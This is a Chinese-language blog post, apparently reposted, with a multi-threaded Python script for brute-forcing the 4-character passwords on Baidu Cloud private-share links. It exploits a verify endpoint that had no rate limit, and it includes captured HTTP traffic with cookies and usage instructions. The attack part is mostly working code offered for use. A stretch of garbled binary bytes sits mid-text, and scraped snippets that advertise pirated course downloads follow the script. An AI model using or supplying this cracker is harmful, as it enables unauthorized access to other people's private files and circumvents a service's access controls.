百度雲私密分享多執行緒破解指令碼
0x01 原理
百度雲私密分享預設是4個字元的密碼,直接破解輸入幾次以後就需要驗證碼。在這篇文章中介紹了百度雲存在可以無限制破解密碼的介面。原理就是不斷用字典去測試存在漏洞的介面,如果密碼正確的話,就會直接set-cookie。
發包:
POST /share/verify?shareid=2411134184&uk=1279847105&t=1447290671171&channel=chunlei&clienttype=0&web=1 HTTP/1.1 Accept: */* Referer: http://pan.baidu.com/share/verify?shareid=2411134184&uk=1279847105&t=1447290671171&channel=chunlei&clienttype=0&web=1 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: pan.baidu.com Content-Length: 8 Cache-Control: no-cache Cookie: BAIDUID=7C656DB6FB750E5B8EFA7D0F522D20E6:FG=1; PANWEB=1; Hm_lvt_adf736c22cd6bcc36a1d27e5af30949e=1444112574; Hm_lvt_773fea2ac036979ebb5fcc768d8beb67=1444112574 pwd=26ms
如果密碼正確,就set-cookie
如果密碼不對,就不會set BDCLND的cookie值
HTTP/1.1 200 OK
Date: Thu, 12 Nov 2015 01:10:38 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
yld: 397079040441508773
X-Powered-By: PHP/5.4.24
Set-Cookie: BDCLND=9oT54bqhvp2AXC06i5UrIsA30BGIl%2Fzjpuex2cSH50c%3D; expires=Sat, 12-Dec-2015 01:10:38 GMT; path=/; domain=pan.baidu.com
Cache-Control: no-cache
Pragma: no-cache
yme: ZIGW/iYrV0kMaDwYTmvhrmlXvvkXVAb3oAhPyyc=
Server: nginx
3e
{"errno":0,"err_msg":"","request_id":7314608073451299749}
0
.....aA....V2..................7B}....A.&S..m.......................o../.......O.$..<..U.kB.a%...k.bN.j...D.X-5O\......................W.^../.N......A...................Q../.N......A.....................WVD.y.......[..S................WVD8........[..S................................................................................................s.... s..*i.........c\t4...G.g^ 所以指令碼編寫就比較簡單,只要傳送沒有cookie的包一個個去嘗試這個介面,檢視返回的set-cookie裡面的內容有沒有"BDCLND=",如果有就爆破成功。
0x02 指令碼的編寫
單執行緒指令碼網站給出了
#!/usr/bin/env python #coding:utf-8 __author__ = 'mtfly' import requests import string import re import sys def main(): url = "http://pan.baidu.com/share/link?shareid=2411134184&uk=1279847105" url = url.replace("link", "verify").replace("init", "verify") headers = { "Content-Type": "application/x-www-form-urlencoded" } payload = "26ms" f = open('dic.txt', "r") for payload in f.readlines(): payload = payload.strip('\n') print payload payload = "pwd=" + payload res = requests.post(url=url, data=payload, headers=headers) a = res.headers["set-cookie"] if "BDCLND=" in a: print "OK" f = open("out.txt", "w+") f.write(payload) f.close exit() f.close() main()
雖然只有四個字元,但是是有26個小寫字元加上10個數字組成的,生成的四個字元個數也有1679616個,單執行緒破解也還是慢,所以筆者自己重寫了一個多執行緒版本的,直接貼程式碼。
#/usr/bin/env python
#conding=utf8
__author__ = 'he1m4n6a'
__doc__ = 'brute baidu yunpan privacy share use multi threads'
import requests
import string
import re
import sys
import threading
from Queue import Queue
class Cframe:
def __init__(self, url, f, thread_num):
self.url = url
self.f = f
self.thread_num = thread_num
def scan(self):
queue = Queue()
for i in xrange(self.thread_num):
worker = BdThread(queue, self.url)
worker.daemon = True
worker.start()
for line in self.f.readlines():
queue.put(line.strip('\n'))
queue.join()
class BdThread(threading.Thread):
def __init__(self, queue, url):
threading.Thread.__init__(self)
self.queue = queue
self.url = url
def run(self):
url = self.url.replace("link", "verify").replace("init", "verify")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
while True:
dic = self.queue.get()
payload = "pwd=" + dic
try:
res = requests.post(url=url, data=payload, headers=headers)
a = res.headers["set-cookie"]
if "BDCLND=" in a:
fo = open('out.txt','w')
mlock = threading.Lock()
mlock.acquire()
print "[+]OK, password is %s" %dic
fo.write(payload)
mlock.release()
fo.close()
else:
#mlock = threading.Lock()
#mlock.acquire()
#print '[-]%s' %dic
#mlock.release()
pass
except Exception, e:
#mlock = threading.Lock()
#mlock.acquire()
#print "[-]connect error"
#mlock.release()
pass
self.queue.task_done()
def main():
if len(sys.argv) < 2:
print '''usage:
python multiBruteYP.py url thread_num'''
sys.exit()
elif len(sys.argv) == 2:
url = sys.argv[1]
thread_num = 20
else:
url = sys.argv[1]
thread_num = int(sys.argv[2])
f = open('dic.txt','r')
cf = Cframe(url, f, thread_num)
cf.scan()
f.close()
if __name__ == '__main__':
main()指令碼下載
用法
python mutliBruteYP.py "http://pan.baidu.com/share/init?shareid=1111111111&uk=11111111111" 50
第一個引數是私密分享的連結
第二個引數是執行緒數,預設20執行緒執行截圖
生成 dic.txt 字典,可以用筆者寫的genPass,一款生成字典的工具。根據終端輸入字串生成4字元字典
具體用法可以參考:
生成的字典下載
現漏洞估計已修復,畢竟見光死
相關推薦
百度雲私密分享多執行緒破解指令碼
0x01 原理 百度雲私密分享預設是4個字元的密碼,直接破解輸入幾次以後就需要驗證碼。在這篇文章中介紹了百度雲存在可以無限制破解密碼的介面。原理就是不斷用字典去測試存在漏洞的介面,如果密碼正確的話,就會直接set-cookie。 發包: POST /share/verif
百度雲網盤私密分享提取密碼暴力破解
雲盤採用四位的純數字提取碼,5分鐘之內能夠暴力猜解出來。 測試地址: http://pan.baidu.com/share/init?shareid=379117&uk=2969867219 BP圖省略,下週一在補 最終http://pan.baidu.com/
慕課網 Kotlin打造完整電商APP 模塊化+MVP+主流框架 百度雲網盤分享
png OS mvp 網盤 分享 模塊 慕課 電商 .com 慕課網 Kotlin打造完整電商APP 模塊化+MVP+主流框架 百度雲網盤分享 慕課網 Kotlin打造完整電商APP 模塊化+MVP+主流框架 百度雲網盤分享
慕課網 微信服務號+Yii 2.0構建商城系統全棧應用 百度雲網盤分享
div .com alt 商城系統 分享 棧應用 微信 info yii 慕課網 微信服務號+Yii 2.0構建商城系統全棧應用 百度雲網盤分享 慕課網 微信服務號+Yii 2.0構建商城系統全棧應用 百度雲網盤分享
主從庫同步與讀寫分離(百度雲教學視訊分享)
目錄 一、理論解析 二、教學視訊 一、理論解析 第一步,Master 及主伺服器將對資料的操作記錄到二進位制日誌當中(Binary log)當中。在每個事務更新資料完成之前,Master 在日誌裡記錄這些改變,MySql 將日誌序列的寫入二進位制當中,在事
超多慕課網實戰教程破解自學教程百度雲盤分享-Python/Java/前端後端/小程序/運維測試/人工智能
上線 備註 面試 漏洞 vue ret 服務號 協作平臺 java軟件 以下課程,需要的可以加我微*信:hgh813210,備註你需要的課程 Java企業級電商項目架構演進之路 Tomcat集群與Redis分布式百度雲實戰分享 前端成長必經之路 基於Storm構建實時熱力分
百度雲盤分享:MySQL零基礎入門視頻教程!
百度雲盤分享:MySQL零基礎入門視頻教程! 首先給大家介紹一下數據庫工程師,數據庫工程師(Database Engineer),是從事管理和維護數據庫管理系統(DBMS) 的相關工作人員的統稱,他屬於運維工程師的一個分支,主要負責業務數據庫從設計、測試到部署交付的全生命周期管理。數據庫工程
Chrome百度雲插件-獲取文件下載鏈接、定制分享密碼
javascriptChrome百度雲插件說明用於chrome瀏覽器的百度雲網頁插件,用於獲取文件下載鏈接,定制文件分享密碼,使用迅雷下載百度雲文件比普通的瀏覽器直接下載的會快。但是跟百度雲會員下載速度還是有區別的。所以,有錢還是開個會員好。 此插件支持文件共享密碼定制,即可以根據自己喜好來設置共享密碼,密碼
計算機四級網絡工程師等級考試題庫軟件---百度雲分享
鏈接失效 pos 計算 軟件 OS 百度 考試題庫 clas 工程 做件好事,考四級的兄弟們一起共勉~~~ 鏈接:https://pan.baidu.com/s/10sWYfEGDJ1JIS7Wm-N2wmA 密碼:vnf4 如果鏈接失效也可以加我QQ(1435679023
分享個Cognos8.4安裝介質的百度雲網盤鏈接
HA pat com https In img inf OS baidu https://pan.baidu.com/share/link?shareid=3750687613&uk=3441846946#list/path=%2F 分享個Cognos8.
UI動效設計從入門到項目實戰 高清無密 百度雲盤
基本 講解 動畫制作 動畫 結合 理論 知識 target 案例 高薪設計師必修課 AE移動UI動效設計從入門到實戰 如今諸多企業已經意識到動效在產品用戶體驗中的重要性,單純的滿足功能性的設計已經out了,動效設計已然成為未來UI設計師必備的能力!本課程采用基礎理論與實戰案
百度百科多執行緒爬蟲(Java)
BaiduBaikeSpider 百度百科多執行緒爬蟲Java原始碼,資料儲存採用了Oracle11g 簡介 採用了MyEclipes作為整合開發環境,應該是相容eclips 使用方法 下載此原始碼之後使用 (匯入 或者 import)操作匯入此專案 各個類介紹
分享百度雲鏈接 Python 3網絡爬蟲開發實戰 ,崔慶才著
51cto 開發實戰 c4c oss tps ces 技術 分享 col 分享百度雲鏈接 Python 3網絡爬蟲開發實戰 ,崔慶才著 百度雲鏈接: https://pan.baidu.com/s/1cIB7etdwh8_eybTiatDbQQ分享百度雲鏈接 Python
百度雲網盤多賬戶管理輔助工具V1.00 (整合百度雲連結批量轉存功能)
軟體名稱:百度雲網盤多賬戶管理輔助工具 主要功能:可以同時管理多個百度雲賬號,可實現百度雲連結的批量轉存。 賬號管理介面 批量轉存介面 軟體下載 百度雲網盤多賬戶管理輔助工具V1.00下載地址 連結:https
10分鐘內教你用Python實現多個檔案自動上傳到百度雲
一、環境說明 Python 3.7 和 win10系統 二、準備工作 首先我們需要安裝一個包,在cmd命令列介面安裝 bypy包。 pip install bypy 然後安裝成功後,在命令列執行命令 bypy info 會彈出一些類似一下的介
【Tool】synergy 配置多機器共享鍵鼠 提供百度雲下載
【Tool】synergy 配置多機器共享鍵鼠 提供百度雲下載 一.Synergy簡述 https://symless.com/synergy 如官網所述,synergy是全平臺適用,多機器多平臺共享鍵鼠的良心應用。 二.獲取方式: 1.官網購買最新版:https://
百度雲百度網盤for mac 破解 分享一個MAC下繞開百度網盤限速下載的方法,三步操作永久生效~~~
相信大家都比較困惑,百度網盤客戶端限速後一般只有幾十K的下載速度,Windows有百度網盤破解版,但MAC的破解版似乎不存在,要提速的話,一般的做法是開超級會員(27元/月),身為程式設計師的我們,是不是有更黑科技一點的方法呢?答案是肯定的,接下來我介紹一種正在使用的方法。(
【轉載】解決百度網盤(百度雲)分享連結不存在失效、分享的檔案已經被取消的問題
一、背景 在我們日常的工作生活中,常常會遇到好不容易在網上找到一個比較滿意的百度雲檔案下載地址,當你愉快的開啟時,卻發現如下圖所示的錯誤: 或者是下面這樣: 讓人很是惱火,那麼今天我們就來通過很簡單的方式來進行解決這個問題。 二、出現該問題的原因 這種情況不是因為我們
C/C++ 之 多執行緒 百度、華為、360 面試面試題彙總(一)
以下提供答案參考: 第一題:執行緒的基本概念、執行緒的基本狀態及狀態之間的關係? 執行緒,有時稱為輕量級程序,是CPU使用的基本單元;它由執行緒ID、程式計數器、暫存器集合和堆疊組成。它與屬於同一程序的其他執行緒共享其程式碼段、資料段和其他作業系統資源(如開啟檔案和訊號)。
Java網路爬蟲(八)--使用多執行緒進行百度圖片的抓取
宣告:如需轉載本篇文章,請進行私聊並在文章首處註明出處,本程式碼未經授權不可用於獲取商業價值,否則後果將由自己承擔。 這次的需求大概是從百度圖片裡面抓取任意的分類的圖片,考慮到有些圖片的資源不是很好,並且由於百度搜索越到後面相關度會越來越低,所以我將每個分類要